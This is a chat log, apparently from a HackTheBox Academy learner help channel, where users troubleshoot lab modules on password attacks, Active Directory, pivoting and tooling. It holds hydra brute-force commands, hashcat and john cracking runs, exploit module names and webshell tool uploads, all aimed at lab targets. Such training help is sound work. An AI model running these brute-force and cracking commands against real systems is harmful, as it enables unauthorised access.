Going through ffuf module, I've started the pwnbox or whatever that website Parrot VM instance is called. Can someone please tell me where do I get the IP and port to access:
http://academy.htb:PORT
Sure. I'm out running errands, but will respond when I get home
Ah... I can't DM you, as I can't add you 🙂
You should be able to DM me without adding it
Ah, nevermind, its privacy settings on my side I think
Hey I'm on https://academy.hackthebox.com/module/115/section/1139 Shells and Payloads Liveengagement. I'm using remmina to rdp into the host but the display is borderline unusable size. Dynamic resolution is greyed out. How can I change the resolution to a more reasonable size?
I'm messing up with the formatting or something
Linux services and internals enumeration - latest python version installed on the target
Have tried whereis, the command given in the section, which etc
Have you tried setting the size based on a % of your screen?
i.e. xfreerdp /size:90%h /v:10.129.2.174 /u:htb-student /p:'Academy_student_AD!'
Even getting interactive with the python3 and grabbing the version, the installed python packages versions etc
xfreerdp command not found. That's why I've been using remmina instead
If I could get xfreerdp to work I'd be happy using that, but I struggled with that in earlier modules and gave up
In Parrot OS, xfreerdp is not installed by default. But you can install it
sudo apt update
sudo apt install aptitude
sudo aptitude install freerdp2-x11
thank you, i didn't realise i need to install aptitude
Can someone please tell me where the pwnbox shows target IP and port?
The PwnBox is browser-based. You do not need IP:Port
thanks for the link, i needed to say no to the first solution; the second solution about dependencies solved it
I have to access admin.academy.htb:PORT for the challenge but I don't see that IP:PORT info anywhere and neither is it in etc/hosts file
You need the TargetIP, not the IP from the PwnBox. The PwnBox is your attacker machine.
Think about where software is installed. Then look in this directory.
Yes but where is this Target IP? I vaguely remember it showed target IP somewhere around/in the module last time I was doing this few months ago but I don't see Target IP anywhere now even after starting pwnbox
Ah man I'm dumb I thought it did that automatically when I started pwnbox. Thanks a lot 🙌🏻
On ACTIVE DIRECTORY ENUMERATION & ATTACKS > Privileged Access > Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt. : Am I supposed to retrieve SQLAdmin credentials (or hash) from the previous DCSync attack or should that be done another way ?
I didn't do it that way. Without spoiling, what can the SQLAdmin log into, which can be used for privilege escalation.
anyone facing problem with the pwnbox and the vpn?
am not able to ping the target and the pwnbox isn't accepting keyboard input
Formatting was fucking up, it was all about damn formatting

It has been in front of me, all the time
PwnBox doesn't need to be connected to the VPN since it's already connected to the HTB network. You might try selecting the "Full Screen" option for the PwnBox so it opens in a new tab if you're having input problems. Alternatively, you might try switching browsers.
Also don't be connected to the VPN and use the Pwnbox at the same time, neither will be able to connect then
tried running the vpn locally its not pinging the target, ill try another browser for the pwnbox thanks!
thanks will do that also
If the target that you have spawned has a port, then you cannot ping it
nevermind, I didn't read the question properly was thinking the SQLAdmin was a user but it's the "blodhound's right" thanks
Just saw an email about "Guided Mode" for HTB VIP, does anyone know if that feature will be implemented in Academy for the labs?
academy should already be "guided"
and skill assessments are well, skill assessments
hello, is someone available to unstick me in the "STACK-BASED BUFFER OVERFLOWS ON LINUX X86" module plz?
lmao
according to my notes I first attacked ||tomcat with a war payload|| and did it manually but my notes also show attacking a social website 😐
Did you solve this?
@pine dagger i'm stuck at this Q: How large can our shellcode theoretically become if we count NOPS and the shellcode size together? (Format: 00 Bytes) - i've tried 'info proc mapping' in gdb , but can't find any clue.
Sadly, I don't have notes on that one from when I did it. However, the answer is literally in the text in the screenshots. You just have to calculate it, based on the numbers they give you.
Thanks! I didn't know about that, I'll have to read up on how that works.
I'm talking about the Labs (Easy, Medium, Hard) that aren't guided.
where i can find room for dante from prolap?
Gain the knowledge and skills to identify and use shells & payloads to establish a foothold on vulnerable Windows & Linux systems. This module utilizes a fictitious scenario where the learner will place themselves in the perspective of a sysadmin trying out for a position on CAT5 Security's network penetration testing team.
Finally finished it

Well done.
I may have made a mistake and led you down the wrong path earlier but I have attacked what appears to be a facebook-like blog on my notes
??
Yes, thats host2
But thanks for helping(or trying to)
they've mentioned that it'd only apply to retired, easy boxes.
you also said "Academy" so i got confused
how to gain access to this link
You need a Silver year subscription
If you answer a question incorrectly a few times, you can contact a mentor via Discord. He will give you hints. You still have to answer the question yourself.
Read and Follow #welcome
Yes mate, from there enumerate further
From windows?
Which user were you trying to log into that didn't work?
Skills assessments are about testing what you have learned. It is a kind of final exam for the module. If you get stuck there, you should work through the module again.
Delete that
Its your phone
Oof
There's two answers clearly visible in the screenshot
I can't read much, I had to zoom in
💀
luckily for you I have proper notes on all of this except which user I used for login
try another user
You should also delete this screenshot. Or hide it behind spoilertags.
It contains references to a user.
I think I would be sharing spoilers, dm?
It contains a username
Usernames should always be placed behind spoilertags
Double |
Anyone avail to dm/dm me on White Box Attacks: User Enumeration via Response Timing? I get the gist of this module, but currently am ~23K out of a possible 650K user names enumerated -- with the lab having timed out twice now just to get this far... would love some filtering to reduce the 650K potential usernames down to something more manageable. Got it -- Thx @pine dagger and @kind turret for the help
password attacks labs take forever when bruteforcing
idk
hello, i found all zones in the DNS module of Attacking Common Services, but i am stuck on this question: "find all available DNS records for the inilanefreight.htb domain on the target name server and submit the flag". as i said, i found all zones but it seems that subbrute did not work for me; i tried dnsenum, sublist3r and subfinder and look
can someone please help me
i echo all zones to the resolvers.txt fyi
and i tried without them
Bruteforcing some services takes longer than others; as a general rule of thumb, avoid bruteforcing ssh unless you really have to.
yeah bud for ssh i normally use ncrack better but im into another service now
Did you add name servers to one of those text files you passed into subbrute?
yes i added them to the resolvers.txt
@rustic sage can i dm you ?
i dont want to make spoilers xdd
guys how to access worm gpt
Hello everyone, can someone help me with brute force assessment where we are to attack /login.php page? I tried multiple wordlists, and in the end I used the hint. But still no luck.
My script:
||hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -u -f 94.237.59.206 -s 54421 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"||
Bruteforcing with rockyou.txt takes like 53 hours. What do I do wrong here?
Any advise or help will be much appreciated.
can someone please help me?
https://academy.hackthebox.com/module/115/section/1139 I'm trying to add the exploit into metasploit, I can't just update because the foothold has no internet. I tried following https://www.amirootyet.com/post/how-to-add-new-exploit-to-metasploit/ but after I add the exploit in it still does not show up when I search. I did updatedb as well
Exercise link?
Search didn’t work for me either, but you can just do “use exploit/whatever/path/numbers”
I am still having trouble with the last question of the section of this module:
https://academy.hackthebox.com/module/22/section/150
command I typed:
`Get-ADUser -Filter * -SearchBase "OU=Pentest,DC=INLANEFREIGHT,DC=LOCAL"`
Result:
Do we earn isc^2 credits for past completed modules ?
what is mean "our own cookie"
It doesn't say "our own cookie"... it does say "replace the cookie value with our own value" though
own value mean this
apparently that is an "earlier authenticated cookie". So you have logged in previously, saved your cookie, logged out and can now use that previous cookie to bypass authentication again. I think it's just teaching you how cookies work.
DM
Trying to SSH with the key in the footprinting hard lab, but I am getting an error in libcrypto and permission denied message
already checked the key was copied with the BEGIN and END messages and did the chmod
Maybe the formatting is off?
I made sure there were no spaces
or lines after
Okay, so I guess you do need a blank line after, it worked now
i put the name and value of the cookie and it did not work, why?
Now access another page that isn't the login screen
Are you still stuck?
how?
Getting an error on footprinting hard
ERROR 2002 (HY000): Can't connect to MySQL server on '<IP>' (115)
This was my command: mysql -u tom -h <IP> -p
Used the same pw I used to get into imaps
Nevermind, apparently you have to use it in the ssh session
What I don't understand is why NMAP didn't show me a port for MySQL at the beginning.
I'm on documentation and reporting module on practice lab question 1, I got an error when I try to rdp to DC01, does anyone knows what cause any of this?
```
[19:19:59:185] [3084:3085] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[19:19:59:185] [3084:3085] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
```
please let me know if you know and thank you!
Because it's only running internally
Makes sense, that's what I was guessing, just wasn't sure.
Are there any good footprinting techniques for scanning services like that once you're inside an SSH session?
probably just linpeas or something?
netstat -tulnpa
Thanks!
Also just checking the user's bash history
Try surrounding the credentials in single quotes and including the domain name in the username:
xfreerdp /v:$IP /u:'DOMAIN\username' /p:'password'
As that will show a lot
Iirc one of the modules reveals root password
In user history
Yeah, the bash history definitely helped, the only reason I went right for that on this lab was because there wasn't much else in there so it was an easy move!
I've just been using ls -lah now, just like -vvv for scans and some other things
Might as well go with the nuclear option if there's a chance you have to use it anyway, lol
Not to say nations should follow that advice
؟؟؟؟؟؟؟؟؟
That would be bad
Its referencing a previously used valid cookie
i do it but also did not work
well it works but turns out I got the wrong credentials, do you know any other way to crack the ipmi hash correctly?
I already tried using john (`john --wordlist=/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt crack.txt`) and hashcat (`hashcat -m 2000 -a 0 crack.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt`)
or changing the wordlist with md5decryptor-uk.txt
wrong hash mode
what hash mode should I use?
hashcat --help | grep -i ipmi
okay thx
Great tip, I usually looked for this online lol
Youre welcome! hate to leave my terminal to find a hash mode on hashcat wiki lol
it did crack one, but it only cracked the password, not the user. tried to separate them but got an error. or was the user actually the one in the kerberos file md after the domain?
Hi guys! I am on AD enum&attacks module, Skills Assessment Part 1. Whenever I try to upload chisel.exe it gives me that response. But I am able to upload for instance mimikatz, rubeus, etc...
Thank you
are u using the browser's upload functionality?
antak webshell
yeah
i faced the same issue back then. I think the filesize is too huge, so i used meterpreter to upload instead
but not chisel
that's an idea
tried using the username from the kerberos file md and the password from hashcat, but I got this when I run xfreerdp: "More documentation is coming, in the meantime consult source files"
may I dm you?
sure
I have a question on https://academy.hackthebox.com/module/160/section/1479 Web Service & API Attacks, on the Server-Side Request Forgery (SSRF) section. This is the question given: "Can you leverage the SSRF vulnerability to identify port 3002 listening locally on the web server? Answer format: Yes, No". It's easy enough to figure out the correct answer. My question is, can someone help me understand how I could modify the commands to actually test this? I have tried a bunch of methods but cannot seem to get it right. An example command I have tried modifying is curl "http://<TARGET IP>:3000/api/userinfo?id=<BASE64 blob>"; that part works fine, but figuring out how to make that tell me if 3002 is listening is what I cannot figure out.
Try and compare the responses if you try and request port 3002 versus something random like 6969
You might not see the exact output from 3002, but trying to access http://IP_ADDRESS:6969 returns an error because there just isn't a service listening there
So maybe we can't interact with port 3002 in the way we like (maybe we can only do stuff blind), but it's still enumeration and info about the server that can potentially help later on
I used hashcat
That is what I was trying, I will poke at it some more. Thanks!
Ok that is a good point, thanks!
Hey guys for the pivoting skills assessment, just wanted to know if I should be using ||WINPIVOT10 as a final pivot to get access to the DC or if its ok for me to just get the flag from the DC network drive||
Not sure if thats too spoilery but I'll remove if it is sorry
Hello, anyone can help with with Initial Enum of Domain in AD module
I found the host with ms-sql-a, yet im getting wrong answer
can anyone tell me why i cant post on community help?
Read and follow #welcome
Dm me
Are you trying to login as v*****?
This is from this module
PASSWORD ATTACKS
Theory of Protection
- Something you know (a password, passcode, pin, etc.).
- Something you have (an ID Card, security key, or other MFA tools).
- Something you are (your physical self, username, email address, or other identifiers.)
Isn't an email address and username something you know?
because an email and password is still not 2fa in my opinion.
Thank you very much
Username and email is kind of awkward to put into a category here, because on one hand it's not really a form of protection as much as a representation of what needs to be protected. On the other hand you can't get into an account without knowing what it is.
When talking about the "you are" category, I would generally associate it with stuff like biometrics (e.g. fingerprinting, retina scans, voice pattern, etc.)
Yeah I was logged in as v on ||WINPIVOT10, but I wasn't sure if this was the last machine or if I needed to use it as a pivot to get to the DC||
but they have taught me everywhere that a username is something you know and a password is something you know. and because you use 2 x something you know it is 1fa. for example if you use a phone (something you have) and face id (something you are) it is 2fa
So you got the flag now?
then just leave it at being something you know
yeah I got it through accessing the ||DC network share available on WINPIVOT10||
i will do 🙂 thx
The sole purpose of categorization is to make things make sense to our monkey brains, so as long as it's internally consistent it's fine. Probably worth mentioning in #858470491676737536 .
Well done.
thanks! I wasn't sure if that was the correct way since I felt like I had to keep practicing pivoting for the exercise ahaha
that was it
sweet as, cheers
Anyone willing to compare notes for the "Living off the Land" exercises in AD Enum and Attacks (https://academy.hackthebox.com/module/143/section/1360) ?
sorry, I thought you where referring to a different module, my mistake
No problem. Does HTB have any support team for such cases? Couldn’t find it on the website 😦
Follow up question for the one who solved this one: what wordlist have you used? Link: https://academy.hackthebox.com/module/57/section/515
Hi, Attacking Common Apps - attacking Joomla. I found the flag_647..... with the cve-2019-10945.py exploit but how can I read it? Tried the "type" and "more" commands, ls, cat.. nothing works, only dir. What am I doing wrong? Thanks
I think silver annual subscribers get support on modules from staff, otherwise you'll have to keep asking in here
Hehehe.
since it's in the root directory you can just browse to read it
Oh thanks yes a curl solved it 😅
Has anyone solved console password attacks ?
please can someone help, I'm on the password mutations section of the password attacks module. hashcat only generates 8 passwords, why?
commands ran: hashcat --force /home/kali/Downloads/Compressed/Password-Attacks/password.list -r custom.rule --stdout | sort -u > mut_password.list
hydra -l sam -P /home/kali/mut_password.list ssh://10.129.134.196
I need help ?!
First method of file transfer module is not working when I tried to use it my virtual windows machine
I guarantee base64 string is true, i don't know why it is not working
that is part of the Skills Assessment but hint there is ||default cred|| and yes if you have silver annual you will have 1 on 1 tutoring
this should be the right command make sure the password list and rule are both from the resource
For this module I am working with the host linux machine right? https://academy.hackthebox.com/module/22/section/157
When I type out this command this is what I get:
`python3 ldapsearch-ad.py -l 10.129.42.188 -t info`
how did you not figure out that the tool isn't in your home directory?
either download the tool from github or use the existing version in /opt/ldapsearch-ad/ldapsearch-ad.py
Hello, sorry to interrupt the conversation, my Facebook account was hacked, is there someone who can help me free of charge. I beg if there is contact me.
read the #rules. this is a cyber security learning platform, not a hacker-for-hire forum. keep asking for things like that and you will get the 👢 from one of the mods
Sorry, I forgot
Hello, I'm on the Kerberos Attacks Skills Assessment. I completed the first 3 questions but I'm stuck at the final one. I try to connect to the machine with psexec.py but every time I try I get a connection refused.
Think about where you need to psexec, what is the machine you need to access and from where you are accessing it
is there a way to use bloodhound-python with pass the hash?
I am trying to find it but I cannot find anything about pth or ptt
I got an error on the documentation and reporting module, reporting lab sections. When I try to do xfreerdp /v:IP /u:'DOMAIN\USERNAME' /p:'PASSWORD' I get this kind of error:
```
[09:00:45:056] [3029:3030] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[09:00:45:056] [3029:3030] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[09:00:45:056] [3029:3030] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
```
anyone knows whats wrong?
thank you
bloodhound does a bunch of LDAP queries to gather information, so I don't think so
Unless there's some way to auth to LDAP with a hash, which I doubt
Module Name Attacks Password
could be a bad password (use single quotes around the password to escape special characters), you also might just need to wait a little bit longer for machines to boot up if you're doing it when it started
Thanks
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
Do you know the problem I did not find the flag ?
have you finished this module? can I dm you for more?
Not right now, a bit busy with something
Ok
You, my friend, need to relax, I wasn't talking to you just yet
Does anyone know what the problem is
I literally don't know what your problem is because you've been copying and pasting a single line from your error instead of sending screenshots of your terminal to give actual context
Also relax with the messages, someone will help you if they want to. While you wait, why not take a small break, or try doing some troubleshooting of your own with google?
ok just asking, when I'm trying to crack the ipmi hash using hashcat, why do I get this? 5768797002000000e05179a2382122e7500df7c9949a89f08a1987132dd0f48fe2e1d37238c7448fa123456789abcdefa123456789abcdef140541444d494e:a60c216003306640422c8855b290c32c53319e5a:SPOILER aren't I supposed to get the username too, or is there something wrong with this syntax? hashcat -m 7300 -a 0 crack.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-75.txt
syntax looks fine, you might want to try using the full rockyou.txt just in case
I think I might have used john but not sure
thats just hashcat being hashcat
so it's better to use john? any suggestion to use it on ipmi hash?
what do you guys think
Like many others I am stuck on Attacking Common Services - Easy. Found the username, but have had no success in brute force so far. Why the F do they provide a password list if it does not work on any service!?
Any help much appreciated! I guess I am wasting a lot of time here...
probably cause of this
if the mutated pw list dont work, try the standard rockyou.txt
That helps
but even without reading that "Note", read the output of the terminal. Looks like the most doesn't do it
I am already running rockyou for hours...
I am using this command: ||hydra -t 64 -l f**** -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.129.191.39 smtp||
anyone know the syntax to use john the ripper to crack an ipmi hash?
Working on the Password Attacks - Attacking LSASS....issue is this: using the move method as per instructions is not working. Has anyone else had this issue? The SMB server share wasn't working in the prev module either
make sure u also add the email domain to the obtained username
hello guys, i enrolled in the networking module. it said it is a fundamental module, but i feel there are a lot of prerequisites to have and concepts that are not defined. do i have to finish a particular course before this one?
what do you need to "move"?
trying to move the lsass.dmp file
what format should I use for ipmi hash in john?
@fiery berry trying to move the lsass.dmp file
there are many ways you can achieve that, have you done the file transfer module?
yes
@fiery berry yes already done that module, the issue is that I get a permissions error
are you using the pwnbox and try to transfer via impacket-smbserver?
@fiery berry yes tried that, getting permissions error
you can do it in a world writable folder like "/tmp" or just use xfreerdp to mount a shared folder

anyone?
could you give some examples or the concepts?
https://academy.hackthebox.com/module/39/section/407 can anyone help with this metasploit practical module? i cant figure out how to exploit the druid service
which mfs module are you using?
payloads
name?
yes I know, but isn't there supposed to be a user or not? or is the user ADMIN or administrator or that user from file 1?
sorry, probably I didn't explain the way I wanted. The exploit name I meant
ohh
|| 0 auxiliary/gather/zookeeper_info_disclosure 2020-10-14 normal No Apache ZooKeeper Information Disclosure||
this is just an info disclosure, im not sure if it has useful info but it did work
||0 exploit/linux/http/apache_druid_js_rce 2021-01-21 excellent Yes Apache Druid 0.20.0 Remote Command Execution|| and i couldnt get this to work at all
||2181/tcp open zookeeper Zookeeper 3.4.14-4c25d480e66aadd371de8bd2fd8da255ac140bcf (Built on 03/06/2019)|| this is the zookeeper version
probably isn't correct, if you run info should give you more information about it
you should look for "druid"
that is the second exploit i used, i think it should work but it isnt, ill keep trying that and come back if i cant figure it out, thanks
colon?
did you set all the options correctly?
already tried that before, still doesn't work
TARGETURI / yes The base path of Apache Druid
should this be changed, to a more specific directory?
only lhost and rhosts should do the work
is the "password attack" the module you're working on?
when they talk about the different topologies of networks they introduce new words without defining them, like "TUN adapter", "routing table", "firewalls". they assume that i know these concepts but i don't!
Yess
section and question?
[!] Cannot reliably check exploitability. should i get this message if im using the right exploit
even in the first page they talk about /24 subnet ext
maybe not sure, just try and see how it goes
Any idea on how to read the data i have tried but couldn't
I sent you a private
these are fairly simple, for instance a firewall is just controlling what traffic enters and exits a network. You should be able to look them up and understand them after a quick search. more complicated topics i assume would be explained 🙂
it could be assuming you know more tbf, this is a type of subnet mask. just think of it as homework i guess. if you want help you can dm me and ill try to explain anything i can.
im still learning about networking so it would be interesting to go through and solve problems
ok, thanks, i will try that. you see, I am more accustomed to learning with textbooks, where each word introduced is defined.
ok thanks a lot brother!

```
At C:\Users\a\Desktop\DomainPasswordSpray.ps1:261 char:21
+ Write-Host "$Message: Waiting for $($Seconds/60) minutes. $($ ...
+ ~~~~~~~~~
Variable reference is not valid. ':' was not followed by a valid variable name character. Consider using ${} to
delimit the name.
```
does anyone know how i should avoid this error message? it's the official .ps1 file from the repo, and i can't import it on the module's machine
Well, it says that you have a mistake at line 261 of your DomainPasswordSpray.ps1 file
Consider using ${} to
delimit the name.
Have you tried
Write-Host "${Message}:Waiting for...
it worked when i used /opt/Empire/empire/server/data/module_source/credentials/DomainPasswordSpray.ps1, but hasnt worked from official github repo, so idk, but working
Well if it's working you don't have any trouble, if you want to fix it for everyone, you could fork the github and do a pull request
Hey Guyz. I dont get something in the information gathering module/ Active subdomain enumeration https://academy.hackthebox.com/module/144/section/1256
Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer.
How do we define a DNS zone? Is that the number of available addresses obtained by doing an AXFR transfer?
add a single space after the "$Message" variable
https://github.com/dafthack/DomainPasswordSpray/issues/31
Hello, can somebody give me a nudge towards the answer for the following:
Module: Password attacks
Section: Password mutations
Question: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam"
I've tried several methods, but I cannot brute the password before the expiration of the target machine.
Currently trying: hydra -l sam -P cut_mut_password.list ftp://10.129.186.213 -t 64 (I've cut the first 17k lines from the wordlist as suggested here and even tried with words starting B, and also opted for ftp brute forcing rather than ssh with no luck)
leave out -t64.
Your command should work as long as you have not removed the password from the list.
May I show you the first couple of lines of my file to make sure it's the right one ?
your pw list should be sorted alphanumerically, whats the first entry in your list?
I do not have the list anymore.
should finish very quickly if you remove 17k lines I think
But with the reduced list you should get the result relatively fast.
I have sent it to your DM
I did that and now it start with B
Yes, I checked my notes again
quick question, im almost done with linux fundamentals. where should i go next?
maybe windows fundamentals
okay, thanks!
I have just found it thank you @tranquil axle & @acoustic owl
You can follow this Path
https://academy.hackthebox.com/path/preview/information-security-foundations
Find a user with unconstrained delegation who is also part of the Protected Users group
Could this command play a role: `python3 /opt/ldapsearch-ad/ldapsearch-ad.py -l 10.129.42.188 -t info`
Another tool was described in the module. Try it with this one. Look in the help and see how you can enter the marked parts of the question.
sure, send me a dm
Any hacking tips?(mobile)
Need it for a revenge on the dud spiting on me and few more
Not what this server is for
- illegal
Dang it
use a computer
hi, I want to hack the game Roblox
read #rules
But they want to hack Roblox, not read the rules 
the eternal struggle
Yes, rules are silly, I know. But they can protect you from get a 👢
How is it that Responder, when gaining a foothold, caught other users than the Inveigh module run from inside the domain?
hello dear friends, i am at AD Enumeration & Attacks - Skills Assessment Part I. i am at MS01 as user sv***, i am searching the files for the cleartext pass of user t** but can't find it anywhere. am i on the right path?
Not the right path, try some techniques taught in the module to harvest credentials and such
ok thanks, the question was tricky
Hello is anyone out there decent with MSSQL Studio syntax? I'm having trouble incorporating a WHERE clause in my SQL query. I've tried many iterations but keep coming up with invalid column name. I've verified I can use the WHERE clause on the id column but having trouble with name. Anyone else run into this?|| /****** Script for SelectTopNRows command from SSMS ******/
SELECT TOP (1000) [id]
,[name]
,[password]
FROM [accounts].[dbo].[devsacc]
WHERE [accounts].[dbo].[devsacc].name=("HTB")||
lol wow nvm
Used single quotes and removed the parentheses and it worked 🙂
It works with parentheses too, haha single vs double quotes gets me in trouble, I should probably learn why 😄
Hi all, I’m really stuck on the pen testing path. I’m on the Attacking Common Services module, specifically the attacking SQL section. I can’t for the life in me work out how to get the password for the mssql user as question 1 asks for. I can connect to the server with sqlcmd as htbuser, I can view the tables but cannot see any hashes for users. Clearly overlooking something. Can anyone help please? Thank you 👍
what other methods did the module teach you?
That’s where I’m struggling, I’m following the module content but not helpful
I’m after some pointers not the answer
As the cheat sheet isn’t helping
its kinda hard to give a pointer without giving away the answer
Hey guys, currently doing the FFUF introduction module. Does anyone know how to get rid of the junk results from the output
but you are right, its not in the cheatsheet
oh it actually is in the cheatsheet
i take that back
Ok. Shall re re re read it
Thank you
I can tell you the chapter name if you want?
Yes please
Capture MSSQL Service Hash
look the flags you can use, there are a couple different ways to filter results
Ok, I'll look into that. Thanks
there's one flag specifically for comments in wordlists
Ok I got it now. This flag was mentioned earlier but it didn't register in my head that it's used with ffuf
Thanks for leading me to the right path!
I'm trying to install crackmapexec on my htb ParrotOS vm but I can't get it done with the code example in the section sudo apt-get -y install crackmapexec
I've looked for answers on the web and on crackmapexec's website but I am still unable to install it.
The error message that I get with apt-get: The following packages have unmet dependencies:
crackmapexec : Depends: python3-lsassy but it is not installable
Depends: python3-neo4j but it is not installable
Depends: python3-pypsrp but it is not installable
And i can't seem to install them manually either.
Anyone know how I might be able to fix it?
Did you check github?
yup, When I follow the instructions under the Python package section python3 -m pip install pipx i get the output in the screenshot
Try this - sudo apt install -y python3 python3-pip python3-venv libssl-dev libffi-dev build-essential
this will install any missing dependencies for you before the installation of crackmapexec
check and tell me
This should be solved after the installation of the dependencies
Wish it worked
Did you clone the crackmapexec?
I did clone it, the Folder has been created in my home directory
anyone can help with pwd medium lab pls? I have got users, struggling after ||opening doc file||
May I tell you the set of commands from the beginning? lets try
I'm all ears
Check the update - sudo apt update
then use this to install the missing dependencies: sudo apt install -y python3 python3-pip python3-venv libssl-dev libffi-dev build-essential
Clone the crackmapexec: sudo apt install -y git
clone repository: git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
change directory: cd CrackMapExec
Install CrackMapExec and required Python packages:
pip install -r requirements.txt
python setup.py install
This should work
Type cme to check whether it is installed properly
pip install -r requirements.txt
I think my VM is just thoroughly broken
Did you run all the cmds above without error?
I think I had the same issue and after following the second solution here it worked for me https://stackoverflow.com/questions/73830524/attributeerror-module-lib-has-no-attribute-x509-v-flag-cb-issuer-check
I could run them up until "pip install"
you had the same error?
trying it now
After doing as the 2nd answer suggested, should I run sudo apt-get -y install crackmapexec
?
Do the pip install -r requirements again
It worked... or at least didn't break. I'll try the last few commands Alyosha said
I don't seem to have the setup.py file
Did you setup virtual environment before installing the package?
don't think so
use this for setting up virtual environment: python3 -m venv venv
source venv/bin/activate
and then use - python setup.py install again
Still the same
try running cme and tell me what it shows
I see
some dependencies and packages can change
python3 -m venv venv
source venv/bin/activate - this cmd didn't work?
Their github suggests using
#~ python3 -m pip install pipx
#~ git clone https://github.com/mpgn/CrackMapExec
#~ cd CrackMapExec
#~ pipx install .
It's doing something
something good...
its ALIVE
Nice
Thanks @tranquil axle & @sudden snow for the help.
Yea I remember having issues with that too
im writing the steps down
No problem.
i can't do the easiest part , im doing the shells&payloads module , at the Laudanum part , i already uploaded the payload and gained access to the system and it asked for me to ||submit the path i land in || , i already did it , but the second question is ||Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx) || i can't just find it , i did all the work in my linux so idk where it is located in the pwnbox , can someone give me a hint or just say where it is?
iirc one of the code blocks in the section has the path
the code block from the .aspx?
oh in the page
let me see
my pwnbox just died xd
The one for Move a Copy
yeah already did it , thanks : )
and one more thing if you can help me
where's the "Browser's network settings menu" located in burpsuite?
I'm doing the Windows Fundamentals module and on the question "Which Windows NT version is installed on the workstation? (i.e. Windows X - case sensitive)" in the first section, but the target is on Win 10.
Not too sure. But I think you can ignore it for the most part and just launch the browser from the Proxy>intercept menu
it is saying that i need to disable the sandbox , idk if it is going to interfere a lot but i will do what burpsuite is saying xd
sounds like a good idea.
it just crashed my vm XD
I need to watch a refresher on burpsuite and all its settings and stuff. can't remember them for the life of me.
GL HF
im joking xd , but it didn't support the browser and crashed
i gave it 10 more gb of ram rn
to see if it helps
XD
Can anyone confirm if they're able to reach Splunk in Attacking Common Applications: Splunk - Discovery & Enumeration?
I keep getting connection resets, and I haven't been told that there's a specific vhost that needs to be visited. PRTG Network Monitor on 8080 works fine.
this is what happens when i open the browser XDDD
can't i put it in foxy proxy?
so it doesnt crash the machine
no idea. never used it before
Try enumerating the target.
Its not on 8080
I didn't say it was on 8080
Port 8000 is open, but I'm not getting anything when I try to open it in the browser
Trying with http or https?
Yeah, not everything redirects from http to https.
typing http is muscle memory after doing enough HTB 😅
Ho ho ho
hi, i'm on documentation and reporting module practice lab sections question 1
I'm able to find credentials in h8 weak password md file, but when I use:
xfreedp /v:172.16.5.5 /u:USER@inlanefreight.local /p:PASSWORD it failed, anyone know what's wrong?
At a glance, you missed the r in xfreerdp. I haven't done the module, but you could try moving the domain to /d: instead of @ or just try without it altogether
okay
still doesn't work though
Can you post a screenshot of the output?
Well are you doing it through your vm or through a foothold box?
And have you set up a pivot/port forward if so
You get this one figured out? I've been trying everything from creating a fake smb server (capture hash) to alternative mssql login methods. With the responder and smb share method, nothing is responding when I exec dirtree in sql. Like you, and I'm sure others, I'm definitely overthinking and overlooking this step.
Hi guys! I'm currently doing the footprinting modules and going through the first easy lab of the module... but I got a question that I'd like to know if someone can help me with...
there are other ways to capture hash, use what the module teaches you
when scanning the server I get these services
I can't upload pictures for some reason here :/
But I have ProFTP services on TCP 21 and 2121
the module gives me a login account which works
but every time I try to dir or ls the directory I get
ftp> ls
227 Entering Passive Mode (10,129,42,195,128,3).
150 Opening ASCII mode data connection for file list
226 Transfer complete
and it does not show anything
does anyone know what is happening that causes this issue?
obs: I also tried without passive mode
Yea, I'm looking at the module. I research tweaks to the commands, but nothing responding. I'll keep trial and error on it till it clicks. One thing I'm liking about not getting it right away is it makes it make sense in the end. At least I know the capture hash is the step to work on. Thanks.
oh... this is silly... I did not know you could ls -la as an FTP command :/ Thanks!
I just got it..wow. that step took me a bit. Not quite sure, but i think i was using the target IP on one of the commands versus the vm IP. wiping forehead now. Think I can get thru the rest easier. Thank you!!
The vm htb
What's that?
https://academy.hackthebox.com/module/147/section/1391 Hey guys, I'm in password attacks, password mutations https://academy.hackthebox.com/module/147/section/1391, I've looked at hashcat's FAQ and their cheatsheet to see what might be wrong with my command. I basically c+ped from the HTB cheat sheet. The only thing I'm doing "differently" is trying to use best64.rules rather than a custom.rules
the module very explicitly has designed the challenges to use their provided rule list. You won't be safely guaranteed to generate the correct passwords they picked out if you use a diff wordlist or rule set
okay
I went ahead and made custom.rule but still get "Illegal instruction"
im in shells&payloads module , and i am in the skill assessments , i need to hack 3 hosts but when i scan one of them the only information it gives me is that it is ||running tomcat 10.0.11 and smb2-security-mode 3.1.1|| that seems the right answer to me because i searched on google and i found an "exploit" on google :||https://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html|| can someone tell me if im going the right way
@dire sage look on the desktop, there is a file that might help you
bruhhhh , thank you xd
so let's imagine i want to ||manage the blog|| , here there's no browser
i think i probably need to go through ||apache||
type firefox in cli
"No protocol specified
Unable to init server; Could not connect: Connection refused"
and nothing happened @maiden spindle
illegal instruction is gonna be some sort of issue with your environment or the binary you're using.
You're either going to have to troubleshoot it on your own, or use the pwnbox momentarily for generating the list
